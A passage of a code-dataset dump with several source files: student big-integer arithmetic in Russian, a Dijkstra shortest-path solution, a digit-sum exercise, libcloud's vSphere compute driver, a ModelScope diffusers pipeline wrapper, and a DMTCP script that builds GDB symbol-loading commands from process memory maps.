arr2[..]\r\n# и цифра D, на которую необходимо умножить\r\n\r\n# Алгоритм:\r\n# Умножаем на число, с помощью функции MUL_ND_N, вычитаем, с помощью функции SUB_NN_N, в которой уже есть проверка на то, равны ли числа\r\n\r\n# Выходные данные:\r\n# n_res - длина числа\r\n# A_res - результат вычитания\r\n\r\ndef SUB_NDN_N(n1, A1, n2, A2, D):\r\n A_res = []\r\n n2, A2 = MUL_ND_N(n2, A2, D)\r\n n_res, A_res = SUB_NN_N(n1, A1, n2, A2)\r\n return n_res, A_res\r\n\r\n\r\n# Задача N-10(DIV_NN_Dk): \"Вычисление первой цифры деления большего натурального на меньшее,\r\n# домноженное на 10^k,где k - номер позиции этой цифры (номер считается с нуля)\"\r\n# Выполнил Поллуксов А.В. 
1310\r\n\r\n# Входные данные:\r\n# Программа принимает на вход 2 натуральных числа, представленных следующим образом:\r\n# Целое число (n; arr[..]) - номер старшей позиции и массив цифр\r\n\r\n# Алгоритм:\r\n# 1)Циклично умножаем меньшее число на 10, если в результате оно не будет больше бо́льшего числа\r\n# 2)Параллельно с шагом (1) считаем отступ k\r\n# 3)Пока первое число больше второго, отнимаем из бо́льшего меньшее\r\n# 4)Параллельно с шагом (3) считаем цифру d\r\n\r\n# Выходные данные:\r\n# Первая цифра деления d и его позиция k\r\n\r\ndef DIV_NN_Dk(n_1, arr1, n_2, arr2):\r\n arr_1 = arr1.copy()\r\n arr_2 = arr2.copy()\r\n k = 0\r\n while COM_NN_D(n_1, arr_1, n_2 + 1, arr_2 + [0]) != 1:\r\n n_2, arr_2 = MUL_Nk_N(n_2, arr_2, 1)\r\n k += 1\r\n d = 0\r\n while COM_NN_D(n_1, arr_1, n_2, arr_2) != 1:\r\n n_1, arr_1 = SUB_NN_N(n_1, arr_1, n_2, arr_2)\r\n d += 1\r\n return [d, k]\r\n\r\n\r\n# Задача N-11(DIV_NN_N): \"Частное от деления натуральных чисел\"\r\n# Выполнил Егоров И.М. 1310\r\n\r\n# Входные данные:\r\n# n_1 - длина первого числа, arr_1 - массив цифр первого числа,\r\n# n_2 - длина второго числа, arr_2 - массив цифр второго числа.\r\n\r\n# Алгоритм:\r\n# Создаем результирующий массив k. s - длина массива k. С помощью функции DIV_NN_Dk вычисляем первую цифру частного (arr1 / arr2)\r\n# Прибавляем ее в результирующий массив k. С помощью функции MUL_Nk_N умножаем делитель (arr2) на 10 в степени k_t.\r\n# Вычитаем с помощью функции SUB_NDN_N из arr1 число полученное число t_2 длины t_1 (это arr2 умноженное на 10^k_t)\r\n# Прибавляем 1 к длине результата.\r\n\r\n# Выходные данные:\r\n# Возвращаем результирующий массив k (частное от деления arr1 на arr2 без остатка) и длину этого массива s.\r\n\r\ndef DIV_NN_N(n_1, arr_1, n_2, arr_2):\r\n d_t, k_t = DIV_NN_Dk(n_1, arr_1, n_2, arr_2)\r\n s = k_t + 1\r\n k = [0 for i in range(s)]\r\n while (k_t != 0):\r\n k[s - k_t - 1] = d_t\r\n t_1, t_2 = MUL_Nk_N(n_2, arr_2, k_t)\r\n n_1, arr_1 = SUB_NDN_N(n_1, arr_1, t_1, t_2, d_t)\r\n d_t, k_t = DIV_NN_Dk(n_1, arr_1, n_2, arr_2)\r\n k[s - k_t - 1] = d_t\r\n return [s, k]\r\n\r\n\r\n# Задача N-12(MOD_NN_N): \"Остаток от деления большего натурального числа на меньшее или равное натуральное с остатком(делитель отличен от нуля)\"\r\n# Выполнил Козориз К.И. 1310\r\n\r\n# Входные данные:\r\n# Программа принимает на вход два целых числа, представленных следующим образом:\r\n# Число n1, обозначающее кол-во разрядов, и массив arr1[...] размера n1, содержащий цифры в этих разрядах для первого числа\r\n# Аналогично, n2 и arr2[...] для второго числа\r\n\r\n# Алгоритм:\r\n# С помощью DIV_NN_N находим частное, проверяем не равно ли оно 0, если равно - значит наш массив меньше второго массива, поэтому он является остатком\r\n# Если не равно 0 - с помощью SUB_NDN_N вычитаем из первого числа второе, домноженное на результат деления\r\n\r\n# Выходные данные:\r\n# Программа возвращает длину массива и сам массив целых чисел - остаток от деления\r\n\r\ndef MOD_NN_N(n1, arr1, n2, arr2):\r\n b = arr1.copy()\r\n while len(arr1) >= n2:\r\n arr1 = b.copy()\r\n a = DIV_NN_N(n1, arr1, n2, arr2)[1]\r\n arr1 = b\r\n\r\n if a[0] == 0:\r\n return n1, arr1\r\n n1, b = SUB_NDN_N(n1, b, n2, arr2, 1)\r\n arr2.reverse()\r\n\r\n return n1, arr1\r\n\r\n\r\n# Задача N-13(GCF_NN_N): \"НОД натуральных чисел\"\r\n# Выполнил Козориз К.И. 1310\r\n\r\n# Входные данные:\r\n# Программа принимает на вход два целых числа, представленных следующим образом:\r\n# Число n1, обозначающее кол-во разрядов, и массив arr1[...] 
размера n1, содержащий цифры в этих разрядах для первого числа\r\n# Аналогично, n2 и arr2[...] для второго числа\r\n\r\n# Алгоритм:\r\n# Проверяем какое из двух чисел больше с помощтю функции COM_NN_D, идем в цикле while до того момента,\r\n# пока arr1 и arr2 не равны нулю, при этом если arr1 > arr2 - записываем в arr1 остаток от деления arr1 на arr2,\r\n# иначе наоборот, в конце выводим большее из двух массивов\r\n\r\n# Выходные данные:\r\n# Программа возвращает длину массива и сам массив целых чисел - НОД двух чисел\r\n\r\ndef GCF_NN_N(n1, arr1, n2, arr2):\r\n while NZER_N_B(n1, arr1) == True and NZER_N_B(n2, arr2) == True:\r\n if COM_NN_D(n1, arr1, n2, arr2) == 2: # arr1 > arr2\r\n n1, arr1 = MOD_NN_N(n1, arr1, n2, arr2)\r\n elif COM_NN_D(n1, arr1, n2, arr2) == 1: # arr1 < arr2\r\n n2, arr2 = MOD_NN_N(n2, arr2, n1, arr1)\r\n else:\r\n return n1, arr1\r\n else:\r\n if COM_NN_D(n1, arr1, n2, arr2) == 2: # arr1 > arr2\r\n return n1, arr1\r\n else:\r\n return n2, arr2\r\n\r\n\r\n# N-14(LCM_NN_N): \"НОК натуральных чисел\"\r\n# Выполнил Данилов А.С. 1310\r\n\r\n# Входные данные:\r\n# Программа принимает на вход два натуральных числа, представленных следующим образом:\r\n# Целое число n1 - номер старшей позиции, и массив цифр A1[..]\r\n# Целое число n2 - номер старшей позиции, и массив цифр A2[..]\r\n\r\n# Алгоритм:\r\n# НОК двух натуральных чисел равен их произведению, деленному на НОД этих чисел\r\n\r\n# Выходные данные:\r\n# Программа возвращает длину массива и сам массив целых чисел - НОК двух чисел\r\n\r\ndef LCM_NN_N(n1, A1, n2, A2):\r\n m1, m2 = MUL_NN_N(n1, A1, n2, A2)\r\n g1, g2 = GCF_NN_N(n1, A1, n2, A2)\r\n return DIV_NN_N(m1, m2, g1, g2)\r\n\r\n\r\n","repo_name":"78Moonlight78/dm_computer_algebra","sub_path":"natural.py","file_name":"natural.py","file_ext":"py","file_size_in_byte":21503,"program_lang":"python","lang":"ru","doc_type":"code","stars":0,"dataset":"github-code","pt":"16"}
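natural.py above implements schoolbook arithmetic on most-significant-first digit arrays, up to GCD by repeated remainders and LCM as the product divided by the GCD. A compact sketch of the same digit-array representation, for addition only, cross-checked against Python's built-in integers:

def to_digits(n):
    return [int(ch) for ch in str(n)]

def add_digits(a, b):
    # Schoolbook addition with carry propagation; arrays are most-significant digit first.
    result, carry = [], 0
    a, b = a[::-1], b[::-1]
    for i in range(max(len(a), len(b))):
        s = (a[i] if i < len(a) else 0) + (b[i] if i < len(b) else 0) + carry
        result.append(s % 10)
        carry = s // 10
    if carry:
        result.append(carry)
    return result[::-1]

x, y = 987654321, 123456789
assert add_digits(to_digits(x), to_digits(y)) == to_digits(x + y)
print(add_digits(to_digits(x), to_digits(y)))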
+{"seq_id":"21860311998","text":"import sys\r\nimport heapq\r\nfrom collections import defaultdict\r\n\r\ninput = sys.stdin.readline\r\n\r\nn, m = map(int, input().split())\r\n\r\ngraph = defaultdict(list)\r\nfor _ in range(m):\r\n a, b, c = map(int, input().split())\r\n graph[a].append((b, c))\r\n graph[b].append((a, c))\r\n\r\n# 최단거리를 이루는 간선 그래프\r\npath_graph = defaultdict(list)\r\npath_graph[1] = [1]\r\n\r\n# 다익스트라 수행\r\ndistance_list = [float('inf')] * (n+1)\r\n\r\n# 1번부터 시작\r\ndistance_list[1] = 0\r\n\r\n# 현재 위치에서 가장 가까운 거리, 노드 번호, 경로 리스트\r\nheap = [(0, 1, [1])]\r\n\r\nwhile heap:\r\n dist, node, path = heapq.heappop(heap)\r\n \r\n if dist > distance_list[node]:\r\n continue\r\n \r\n for adj_node, adj_dist in graph[node]:\r\n new_dist = dist + adj_dist\r\n \r\n if new_dist < distance_list[adj_node]:\r\n distance_list[adj_node] = new_dist\r\n new_path = path + [adj_node]\r\n \r\n path_graph[adj_node] = new_path\r\n \r\n heapq.heappush(heap, (new_dist, adj_node, new_path))\r\n \r\npath_to_recover = set()\r\n\r\n# 모든 정점까지 최단 거리를 이루는 간선 탐색하여 복구할 회선을 찾음\r\nfor key in path_graph.keys():\r\n if key == 1:\r\n continue\r\n \r\n # 최단거리를 이루는 간선 모음\r\n shortest_path = path_graph[key]\r\n for i in range(len(shortest_path)-1):\r\n path_to_recover.add((shortest_path[i], shortest_path[i+1]))\r\n \r\nprint(len(path_to_recover))\r\n\r\nfor path in path_to_recover:\r\n print(path[0], path[1])","repo_name":"KimChanw/Python_Algorithm","sub_path":"백준/Gold/2211. 네트워크 복구/네트워크 복구.py","file_name":"네트워크 복구.py","file_ext":"py","file_size_in_byte":1596,"program_lang":"python","lang":"ko","doc_type":"code","stars":0,"dataset":"github-code","pt":"16"}
+{"seq_id":"8994112035","text":"#!/usr/bin/env python3\n#-*- encoding: UTF-8 -*-\n\ndef main():\n try:\n number = int(input(\"Informe um número: \"))\n except:\n print(\"Apenas valores numéricos devem ser informados!\")\n if(number < 0):\n print(\"Apenas valores positivos devem ser informados!\")\n else:\n soma = 0\n aux = number\n while(aux != 0):\n soma = soma + (aux % 10)\n aux = aux // 10\n print(f\"A soma dos algarismo de {number} é {soma}.\")\n\nif(__name__ == \"__main__\"):\n main()\n","repo_name":"luizfelipe1914/Listas-Python","sub_path":"Lista 02/Questao11.py","file_name":"Questao11.py","file_ext":"py","file_size_in_byte":523,"program_lang":"python","lang":"pt","doc_type":"code","stars":0,"dataset":"github-code","pt":"16"}
+{"seq_id":"33493469953","text":"import os\nimport sys\nimport atexit\n\ntry:\n import pysphere\n pysphere\nexcept ImportError:\n raise ImportError('Missing \"pysphere\" dependency. You can install it '\n 'using pip - pip install pysphere')\n\nfrom pysphere import VIServer\nfrom pysphere.vi_task import VITask\nfrom pysphere.vi_mor import VIMor, MORTypes\nfrom pysphere.resources import VimService_services as VI\nfrom pysphere.vi_virtual_machine import VIVirtualMachine\n\nfrom libcloud.utils.decorators import wrap_non_libcloud_exceptions\nfrom libcloud.common.base import ConnectionUserAndKey\nfrom libcloud.common.types import LibcloudError\nfrom libcloud.common.types import InvalidCredsError\nfrom libcloud.compute.base import NodeDriver\nfrom libcloud.compute.base import NodeLocation\nfrom libcloud.compute.base import NodeImage\nfrom libcloud.compute.base import Node\nfrom libcloud.compute.types import NodeState, Provider\nfrom libcloud.utils.networking import is_public_subnet\n\n__all__ = [\n 'VSphereNodeDriver',\n 'VSphere_5_5_NodeDriver'\n]\n\nDEFAULT_API_VERSION = '5.5'\nDEFAULT_CONNECTION_TIMEOUT = 5 # default connection timeout in seconds\n\n\nclass VSphereConnection(ConnectionUserAndKey):\n def __init__(self, user_id, key, secure=True,\n host=None, port=None, url=None, timeout=None):\n if host and url:\n raise ValueError('host and url arguments are mutually exclusive')\n\n if host:\n host_or_url = host\n elif url:\n host_or_url = url\n else:\n raise ValueError('Either \"host\" or \"url\" argument must be '\n 'provided')\n\n self.host_or_url = host_or_url\n self.client = None\n super(VSphereConnection, self).__init__(user_id=user_id,\n key=key, secure=secure,\n host=host, port=port,\n url=url, timeout=timeout)\n\n def connect(self):\n self.client = VIServer()\n\n trace_file = os.environ.get('LIBCLOUD_DEBUG', None)\n\n try:\n self.client.connect(host=self.host_or_url, user=self.user_id,\n password=self.key,\n sock_timeout=DEFAULT_CONNECTION_TIMEOUT,\n trace_file=trace_file)\n except Exception:\n e = sys.exc_info()[1]\n message = e.message\n fault = getattr(e, 'fault', None)\n\n if fault == 'InvalidLoginFault':\n raise InvalidCredsError(message)\n\n raise LibcloudError(value=message, driver=self.driver)\n\n atexit.register(self.disconnect)\n\n def disconnect(self):\n if not self.client:\n return\n\n try:\n self.client.disconnect()\n except Exception:\n # Ignore all the disconnect errors\n pass\n\n def run_client_method(self, method_name, **method_kwargs):\n method = getattr(self.client, method_name, None)\n return method(**method_kwargs)\n\n\nclass VSphereNodeDriver(NodeDriver):\n name = 'VMware vSphere'\n website = 'http://www.vmware.com/products/vsphere/'\n type = Provider.VSPHERE\n connectionCls = VSphereConnection\n\n NODE_STATE_MAP = {\n 'POWERED ON': NodeState.RUNNING,\n 'POWERED OFF': NodeState.STOPPED,\n 'SUSPENDED': NodeState.SUSPENDED,\n 'POWERING ON': NodeState.PENDING,\n 'POWERING OFF': NodeState.PENDING,\n 'SUSPENDING': NodeState.PENDING,\n 'RESETTING': NodeState.PENDING,\n 'BLOCKED ON MSG': NodeState.ERROR,\n 'REVERTING TO SNAPSHOT': NodeState.PENDING\n }\n\n def __new__(cls, username, password, secure=True, host=None, port=None,\n url=None, api_version=DEFAULT_API_VERSION, **kwargs):\n if cls is VSphereNodeDriver:\n if api_version == '5.5':\n cls = VSphere_5_5_NodeDriver\n else:\n raise NotImplementedError('Unsupported API version: %s' %\n (api_version))\n return super(VSphereNodeDriver, cls).__new__(cls)\n\n def __init__(self, username, password, secure=True,\n host=None, 
port=None, url=None, timeout=None):\n self.url = url\n super(VSphereNodeDriver, self).__init__(key=username, secret=password,\n secure=secure, host=host,\n port=port, url=url)\n\n @wrap_non_libcloud_exceptions\n def list_locations(self):\n \"\"\"\n List available locations.\n\n In vSphere case, a location represents a datacenter.\n \"\"\"\n datacenters = self.connection.client.get_datacenters()\n\n locations = []\n for id, name in datacenters.items():\n location = NodeLocation(id=id, name=name, country=None,\n driver=self)\n locations.append(location)\n\n return locations\n\n @wrap_non_libcloud_exceptions\n def list_images(self):\n \"\"\"\n List available images (templates).\n \"\"\"\n server = self.connection.client\n\n names = ['name', 'config.uuid', 'config.template']\n properties = server._retrieve_properties_traversal(\n property_names=names,\n from_node=None,\n obj_type=MORTypes.VirtualMachine)\n\n images = []\n for prop in properties:\n id = None\n name = None\n is_template = False\n\n for item in prop.PropSet:\n if item.Name == 'config.uuid':\n id = item.Val\n if item.Name == 'name':\n name = item.Val\n elif item.Name == 'config.template':\n is_template = item.Val\n\n if is_template:\n image = NodeImage(id=id, name=name, driver=self)\n images.append(image)\n\n return images\n\n @wrap_non_libcloud_exceptions\n def list_nodes(self):\n vm_paths = self.connection.client.get_registered_vms()\n nodes = self._to_nodes(vm_paths=vm_paths)\n\n return nodes\n\n @wrap_non_libcloud_exceptions\n @wrap_non_libcloud_exceptions\n def ex_clone_node(self, node, name, power_on=True, template=False):\n \"\"\"\n Clone the provided node.\n\n :param node: Node to clone.\n :type node: :class:`libcloud.compute.base.Node`\n\n :param name: Name of the new node.\n :type name: ``str``\n\n :param power_on: Power the new node on after being created.\n :type power_on: ``bool``\n\n :param template: Specifies whether or not the new virtual machine\n should be marked as a template.\n :type template: ``bool``\n\n :return: New node.\n :rtype: :class:`libcloud.compute.base.Node`\n \"\"\"\n vm = self._get_vm_for_node(node=node)\n new_vm = vm.clone(name=name, power_on=power_on, template=template)\n new_node = self._to_node(vm=new_vm)\n\n return new_node\n\n @wrap_non_libcloud_exceptions\n def ex_migrate_node(self, node, resource_pool=None, host=None,\n priority='default'):\n \"\"\"\n Migrate provided node to a new host or resource pool.\n\n :param node: Node to clone.\n :type node: :class:`libcloud.compute.base.Node`\n\n :param resource_pool: ID of the target resource pool to migrate the\n node into.\n :type resource_pool: ``str``\n\n :param host: Target host to migrate the host to.\n :type host: ``str``\n\n :param priority: Migration task priority. 
Possible values: default,\n high, low.\n :type priority: ``str``\n\n :return: True on success.\n :rtype: ``bool``\n \"\"\"\n vm = self._get_vm_for_node(node=node)\n vm.migrate(priority=priority, resource_pool=resource_pool, host=host)\n\n return True\n\n @wrap_non_libcloud_exceptions\n def reboot_node(self, node):\n vm = self._get_vm_for_node(node=node)\n vm.reset()\n\n return True\n\n @wrap_non_libcloud_exceptions\n def destroy_node(self, node, ex_remove_files=True):\n \"\"\"\n :param ex_remove_files: Remove all the files from the datastore.\n :type ex_remove_files: ``bool``\n \"\"\"\n ex_remove_files = False\n vm = self._get_vm_for_node(node=node)\n\n server = self.connection.client\n\n # Based on code from\n # https://pypi.python.org/pypi/pyxenter\n if ex_remove_files:\n request = VI.Destroy_TaskRequestMsg()\n\n _this = request.new__this(vm._mor)\n _this.set_attribute_type(vm._mor.get_attribute_type())\n request.set_element__this(_this)\n ret = server._proxy.Destroy_Task(request)._returnval\n task = VITask(ret, server)\n\n # Wait for the task to finish\n status = task.wait_for_state([task.STATE_SUCCESS,\n task.STATE_ERROR])\n\n if status == task.STATE_ERROR:\n raise LibcloudError('Error destroying node: %s' %\n (task.get_error_message()))\n else:\n request = VI.UnregisterVMRequestMsg()\n\n _this = request.new__this(vm._mor)\n _this.set_attribute_type(vm._mor.get_attribute_type())\n request.set_element__this(_this)\n ret = server._proxy.UnregisterVM(request)\n task = VITask(ret, server)\n\n return True\n\n @wrap_non_libcloud_exceptions\n def ex_stop_node(self, node):\n vm = self._get_vm_for_node(node=node)\n vm.power_off()\n\n return True\n\n @wrap_non_libcloud_exceptions\n def ex_start_node(self, node):\n vm = self._get_vm_for_node(node=node)\n vm.power_on()\n\n return True\n\n @wrap_non_libcloud_exceptions\n def ex_suspend_node(self, node):\n vm = self._get_vm_for_node(node=node)\n vm.suspend()\n\n return True\n\n @wrap_non_libcloud_exceptions\n def ex_get_resource_pools(self):\n \"\"\"\n Return all the available resource pools.\n\n :rtype: ``dict``\n \"\"\"\n result = self.connection.client.get_resource_pools()\n return result\n\n @wrap_non_libcloud_exceptions\n def ex_get_resource_pool_name(self, node):\n \"\"\"\n Retrieve resource pool name for the provided node.\n\n :rtype: ``str``\n \"\"\"\n vm = self._get_vm_for_node(node=node)\n return vm.get_resource_pool_name()\n\n @wrap_non_libcloud_exceptions\n def ex_get_hosts(self):\n \"\"\"\n Return all the available hosts.\n\n :rtype: ``dict``\n \"\"\"\n result = self.connection.client.get_hosts()\n return result\n\n @wrap_non_libcloud_exceptions\n def ex_get_datastores(self):\n \"\"\"\n Return all the available datastores.\n\n :rtype: ``dict``\n \"\"\"\n result = self.connection.client.get_datastores()\n return result\n\n @wrap_non_libcloud_exceptions\n def ex_get_node_by_path(self, path):\n \"\"\"\n Retrieve Node object for a VM with a provided path.\n\n :type path: ``str``\n :rtype: :class:`libcloud.compute.base.Node`\n \"\"\"\n vm = self.connection.client.get_vm_by_path(path)\n node = self._to_node(vm=vm)\n return node\n\n def ex_get_node_by_uuid(self, uuid):\n \"\"\"\n Retrieve Node object for a VM with a provided uuid.\n\n :type uuid: ``str``\n \"\"\"\n vm = self._get_vm_for_uuid(uuid=uuid)\n node = self._to_node(vm=vm)\n return node\n\n @wrap_non_libcloud_exceptions\n def ex_get_server_type(self):\n \"\"\"\n Return VMware installation type.\n\n :rtype: ``str``\n \"\"\"\n return self.connection.client.get_server_type()\n\n 
@wrap_non_libcloud_exceptions\n def ex_get_api_version(self):\n \"\"\"\n Return API version of the vmware provider.\n\n :rtype: ``str``\n \"\"\"\n return self.connection.client.get_api_version()\n\n def _get_vm_for_uuid(self, uuid, datacenter=None):\n \"\"\"\n Retrieve VM for the provided UUID.\n\n :type uuid: ``str``\n \"\"\"\n server = self.connection.client\n\n dc_list = []\n if datacenter and VIMor.is_mor(datacenter):\n dc_list.append(datacenter)\n else:\n dc = server.get_datacenters()\n if datacenter:\n dc_list = [k for k, v in dc.iteritems() if v == datacenter]\n else:\n dc_list = list(dc.iterkeys())\n\n for mor_dc in dc_list:\n request = VI.FindByUuidRequestMsg()\n search_index = server._do_service_content.SearchIndex\n mor_search_index = request.new__this(search_index)\n mor_search_index.set_attribute_type(MORTypes.SearchIndex)\n request.set_element__this(mor_search_index)\n\n mor_datacenter = request.new_datacenter(mor_dc)\n mor_datacenter.set_attribute_type(MORTypes.Datacenter)\n request.set_element_datacenter(mor_datacenter)\n\n request.set_element_vmSearch(True)\n request.set_element_uuid(uuid)\n\n try:\n vm = server._proxy.FindByUuid(request)._returnval\n except VI.ZSI.FaultException:\n pass\n else:\n if vm:\n return VIVirtualMachine(server, vm)\n\n return None\n\n def _to_nodes(self, vm_paths):\n nodes = []\n for vm_path in vm_paths:\n vm = self.connection.client.get_vm_by_path(vm_path)\n node = self._to_node(vm=vm)\n nodes.append(node)\n\n return nodes\n\n def _to_node(self, vm):\n assert(isinstance(vm, VIVirtualMachine))\n\n properties = vm.get_properties()\n status = vm.get_status()\n\n uuid = vm.properties.config.uuid\n instance_uuid = vm.properties.config.instanceUuid\n\n id = uuid\n name = properties['name']\n public_ips = []\n private_ips = []\n\n state = self.NODE_STATE_MAP.get(status, NodeState.UNKNOWN)\n ip_address = properties.get('ip_address', None)\n net = properties.get('net', [])\n resource_pool_id = str(vm.properties.resourcePool._obj)\n\n try:\n operating_system = vm.properties.summary.guest.guestFullName,\n except Exception:\n operating_system = 'unknown'\n\n extra = {\n 'uuid': uuid,\n 'instance_uuid': instance_uuid,\n 'path': properties['path'],\n 'resource_pool_id': resource_pool_id,\n 'hostname': properties.get('hostname', None),\n 'guest_id': properties['guest_id'],\n 'devices': properties.get('devices', {}),\n 'disks': properties.get('disks', []),\n 'net': net,\n\n 'overall_status': vm.properties.overallStatus,\n 'operating_system': operating_system,\n\n 'cpus': vm.properties.config.hardware.numCPU,\n 'memory_mb': vm.properties.config.hardware.memoryMB\n }\n\n # Add primary IP\n if ip_address:\n if is_public_subnet(ip_address):\n public_ips.append(ip_address)\n else:\n private_ips.append(ip_address)\n\n # Add other IP addresses\n for nic in net:\n ip_addresses = nic['ip_addresses']\n for ip_address in ip_addresses:\n try:\n is_public = is_public_subnet(ip_address)\n except Exception:\n # TODO: Better support for IPv6\n is_public = False\n\n if is_public:\n public_ips.append(ip_address)\n else:\n private_ips.append(ip_address)\n\n # Remove duplicate IPs\n public_ips = list(set(public_ips))\n private_ips = list(set(private_ips))\n\n node = Node(id=id, name=name, state=state, public_ips=public_ips,\n private_ips=private_ips, driver=self, extra=extra)\n return node\n\n def _get_vm_for_node(self, node):\n uuid = node.id\n vm = self._get_vm_for_uuid(uuid=uuid)\n return vm\n\n def _ex_connection_class_kwargs(self):\n kwargs = {\n 'url': self.url\n }\n\n 
return kwargs\n\n\nclass VSphere_5_5_NodeDriver(VSphereNodeDriver):\n name = 'VMware vSphere v5.5'\n","repo_name":"Psiphon-Inc/psiphon-automation","sub_path":"Automation/libcloud/libcloud/compute/drivers/vsphere.py","file_name":"vsphere.py","file_ext":"py","file_size_in_byte":16515,"program_lang":"python","lang":"en","doc_type":"code","stars":26,"dataset":"github-code","pt":"16"}
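_to_node in the vSphere driver splits a VM's addresses into public and private lists with libcloud's is_public_subnet helper and then deduplicates them. A rough standalone sketch of the same classification using only the standard-library ipaddress module (is_global is an approximation of that helper, and the sample addresses are invented):

import ipaddress

def split_addresses(addresses):
    public, private = [], []
    for addr in addresses:
        try:
            ip = ipaddress.ip_address(addr)
        except ValueError:
            continue                    # skip anything that is not a literal IP
        (public if ip.is_global else private).append(addr)
    # Deduplicate while keeping the first occurrence of each address.
    return list(dict.fromkeys(public)), list(dict.fromkeys(private))

sample = ["8.8.8.8", "10.0.0.5", "192.168.1.20", "8.8.8.8", "fe80::1"]
print(split_addresses(sample))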
+{"seq_id":"22863633488","text":"import os\nfrom typing import Any, Dict, Generator, List, Union\n\nfrom modelscope.pipelines.base import Input, Pipeline\nfrom modelscope.utils.constant import Hubs\nfrom modelscope.utils.device import create_device\nfrom modelscope.utils.hub import snapshot_download\n\n\nclass DiffusersPipeline(Pipeline):\n\n def __init__(self, model: str, device: str = 'gpu', **kwargs):\n \"\"\"\n use `model` to create a diffusers pipeline\n Args:\n model: model id on modelscope hub or local dir.\n device: str = 'gpu'\n \"\"\"\n\n self.device_name = device\n self.cfg = None\n self.preprocessor = None\n self.framework = None\n self.device = create_device(self.device_name)\n self.hubs = kwargs.get('hubs', Hubs.modelscope)\n\n # make sure we download the model from modelscope hub\n model_folder = model\n if not os.path.isdir(model_folder):\n if self.hubs != Hubs.modelscope:\n raise NotImplementedError(\n 'Only support model retrieval from ModelScope hub for now.'\n )\n model_folder = snapshot_download(model)\n\n self.model = model_folder\n self.models = [self.model]\n self.has_multiple_models = len(self.models) > 1\n\n def preprocess(self, inputs: Dict[str, Any], **kwargs) -> Dict[str, Any]:\n return inputs\n\n def postprocess(self, inputs: Dict[str, Any], **kwargs) -> Dict[str, Any]:\n return inputs\n\n def __call__(self, input: Union[Input, List[Input]], *args,\n **kwargs) -> Union[Dict[str, Any], Generator]:\n preprocess_params, forward_params, postprocess_params = self._sanitize_parameters(\n **kwargs)\n self._check_input(input)\n out = self.preprocess(input, **preprocess_params)\n out = self.forward(out, **forward_params)\n out = self.postprocess(out, **postprocess_params)\n self._check_output(out)\n return out\n","repo_name":"modelscope/modelscope","sub_path":"modelscope/pipelines/multi_modal/diffusers_wrapped/diffusers_pipeline.py","file_name":"diffusers_pipeline.py","file_ext":"py","file_size_in_byte":1975,"program_lang":"python","lang":"en","doc_type":"code","stars":4825,"dataset":"github-code","pt":"16"}
+{"seq_id":"71017102729","text":"#!/usr/bin/env python\n\n# Usage: python THIS_FILE PID > GDB_SCRIPT\n# OR: THIS_FILE PID > GDB_SCRIPT\n# Invoke this on a running process, prior to checkpoint.\n# This creates a GDB_SCRIPT file that can restore the debugging\n# information during restart. On restart, do:\n# (gdb) source GDB_SCRIPT\n\nimport sys\nimport subprocess\nimport re\nimport os\n\ndef is_executable(filename):\n # 16 bytes for ELF magic number; then 2 bytes (short) for ELF type\n header = open(filename, \"rb\")\n elf_magic_number = header.read(16)\n elf_type = header.read(2)\n # Is it little-endian or big-endian\n elf_type = elf_type[0] if sys.byteorder == \"little\" else elf_type[1]\n # Handle both Python2.7 and Python3: type 2 is executable; type 3 is .so file\n elf_type = elf_type if isinstance(elf_type, int) else ord(elf_type)\n return elf_type == 2\n\n# FROM: https://stackoverflow.com/questions/33049201/gdb-add-symbol-file-all-sections-and-load-address\ndef relocatesections(filename):\n p = subprocess.Popen([\"readelf\", \"-S\", filename], stdout = subprocess.PIPE)\n sections = []\n textaddr = '0'\n for line in p.stdout.readlines():\n line = line.decode(\"utf-8\").strip()\n if not line.startswith('['):\n continue\n if line.startswith('[ 0]') or line.startswith('[Nr]'):\n continue\n line = line.replace(\"[ \", \"[\", 1)\n\n fieldsvalue = line.split()\n fieldsname = ['number', 'name', 'type', 'addr', 'offset', 'size',\n 'entsize', 'flags', 'link', 'info', 'addralign']\n sec = dict(zip(fieldsname, fieldsvalue))\n if not sec['name'].startswith(\".\"):\n continue\n if \".note\" in sec['name']:\n continue\n sections.append(sec)\n if sec['name'] == '.text':\n textaddr = sec['addr']\n return (textaddr, sections)\n\n\ndef writeSymbolFileToScript(filename_substring):\n (filename, base_addr) = memory_region(filename_substring)\n if is_executable(filename):\n base_addr = 0 # ELF executables already hard-wired absolute address\n (textaddr, sections) = relocatesections(filename)\n cmd = \"add-symbol-file %s 0x%x\" % (filename, int(textaddr, 16) + base_addr)\n for s in sections:\n addr = int(s['addr'], 16)\n if s['name'] == '.text' or addr == 0:\n continue\n cmd += \" -s %s 0x%x\" % (s['name'], addr + base_addr)\n print(cmd + \"\\n\")\n\n\ndef saveSymbolFilesToGdbScript():\n if len(sys.argv) != 2:\n sys.stderr.write(\"Usage: %s PID > gdb_script_file\\n\" % sys.argv[0])\n sys.exit(1)\n procmaps_file = \"/proc/\" + getpid() + \"/maps\"\n if (not os.path.isfile(procmaps_file)):\n sys.stderr.write(\"No such file: \" + procmaps_file + \"\\n\")\n sys.exit(1)\n if (not os.access(procmaps_file, os.R_OK)):\n sys.stderr.write(\"No read permission on file: \" + procmaps_file + \"\\n\")\n sys.exit(1)\n\n print(\"# GDB script; Either 'gdb -x THIS_FILE' or: (gdb) source THIS_FILE\\n\")\n for (filename, _) in memory_regions():\n writeSymbolFileToScript(filename)\n\n# Helper functions for writeSymbolFileToScript\ndef getpid():\n return sys.argv[1]\n\n# This returns a pair: (FILENAME_OR_LIBNAME, ADDRESS)\ndef procmap_filename_address(line):\n return (\"/\"+line.split(\" /\")[-1], int(\"0x\"+line.split(\"-\")[0], 16))\ndef memory_regions():\n p = subprocess.Popen([\"cat\", \"/proc/\"+getpid()+\"/maps\"],\n stdout = subprocess.PIPE)\n procmap_lines = [line.decode(\"utf-8\").strip()\n for line in p.stdout.readlines()]\n return [procmap_filename_address(memory) for memory in procmap_lines\n if \" /\" in memory and \"r-x\" in memory]\n\ndef memory_region(filename_substring):\n regions = memory_regions()\n return 
[region for region in regions if filename_substring in region[0]][0]\n\nsaveSymbolFilesToGdbScript()\n","repo_name":"dmtcp/dmtcp","sub_path":"util/save-symbol-files-to-gdb-script.py","file_name":"save-symbol-files-to-gdb-script.py","file_ext":"py","file_size_in_byte":3723,"program_lang":"python","lang":"en","doc_type":"code","stars":343,"dataset":"github-code","pt":"16"}
